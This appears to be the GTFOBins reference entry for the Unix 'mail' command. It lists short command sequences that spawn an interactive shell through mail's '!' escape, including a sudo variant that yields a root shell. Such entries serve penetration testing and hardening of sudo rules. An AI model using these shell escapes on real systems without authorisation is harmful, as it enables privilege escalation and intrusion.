Files
GTFOBins.github.io/_gtfobins/mail.md
2018-06-17 11:27:03 +01:00

12 lines
179 B
Markdown

---
functions:
execute-interactive:
- code: |
mail -f /etc/hosts
!/bin/sh
sudo-enabled:
- code: |
sudo mail -f /etc/hosts
!/bin/sh
---